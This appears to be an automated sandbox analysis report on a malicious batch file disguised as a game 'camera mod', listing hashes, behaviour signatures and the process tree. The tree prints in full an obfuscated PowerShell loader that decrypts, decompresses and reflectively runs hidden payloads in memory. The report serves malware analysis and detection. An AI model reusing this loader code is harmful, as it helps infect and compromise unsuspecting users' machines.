Analysis
-
max time kernel
16s -
max time network
17s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
04/09/2024, 04:24
Static task
static1
Behavioral task
behavioral1
Sample
Devs Camera Mod.bat
Resource
win7-20240708-en
6 signatures
150 seconds
General
-
Target
Devs Camera Mod.bat
-
Size
320KB
-
MD5
58507a2c740eb9251ee878ce7f25b72a
-
SHA1
d9702407c6390f65e5cff7c0c331352f5bfc52b8
-
SHA256
b1e02899752b3e45311d824e70bed91652fcfae6ad24e42a8cd91741def5af92
-
SHA512
be89349449467532f042789601dca41356944f9ae899c7a7725bc077608c37afc35a43cac9b8d92db437f1eae3da533dcc3cc1a39e8437dacd75842e5b5f9131
-
SSDEEP
6144:Qs2zVlFK4D5IHQgPJngBrG6VGVLcD+YIxMXWonO:QPxnGs+5cD1I6XbO
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2592 powershell.exe -
Deletes itself 1 IoCs
pid Process 2908 cmd.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2592 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2592 powershell.exe -
Suspicious use of WriteProcessMemory 9 IoCs
description pid Process procid_target PID 2908 wrote to memory of 2556 2908 cmd.exe 31 PID 2908 wrote to memory of 2556 2908 cmd.exe 31 PID 2908 wrote to memory of 2556 2908 cmd.exe 31 PID 2556 wrote to memory of 2408 2556 net.exe 32 PID 2556 wrote to memory of 2408 2556 net.exe 32 PID 2556 wrote to memory of 2408 2556 net.exe 32 PID 2908 wrote to memory of 2592 2908 cmd.exe 33 PID 2908 wrote to memory of 2592 2908 cmd.exe 33 PID 2908 wrote to memory of 2592 2908 cmd.exe 33
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Devs Camera Mod.bat"1⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:2908 -
C:\Windows\system32\net.exenet file2⤵
- Suspicious use of WriteProcessMemory
PID:2556 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file3⤵PID:2408
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7q3pYSfGwp6K6dlCFvkWbgtv/dBsW50RyMh5vQnsYG4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('fsqAJFV1AROJcZz5keHA4A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $NQmky=New-Object System.IO.MemoryStream(,$param_var); $KMpfA=New-Object System.IO.MemoryStream; $BQpzm=New-Object System.IO.Compression.GZipStream($NQmky, [IO.Compression.CompressionMode]::Decompress); $BQpzm.CopyTo($KMpfA); $BQpzm.Dispose(); $NQmky.Dispose(); $KMpfA.Dispose(); $KMpfA.ToArray();}function execute_function($param_var,$param2_var){ $nOAIs=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $eOdYi=$nOAIs.EntryPoint; $eOdYi.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Devs Camera Mod.bat';$qnoql=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Devs Camera Mod.bat').Split([Environment]::NewLine);foreach ($hbFVI in $qnoql) { if ($hbFVI.StartsWith(':: ')) { $icdoU=$hbFVI.Substring(3); break; }}$payloads_var=[string[]]$icdoU.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2592
-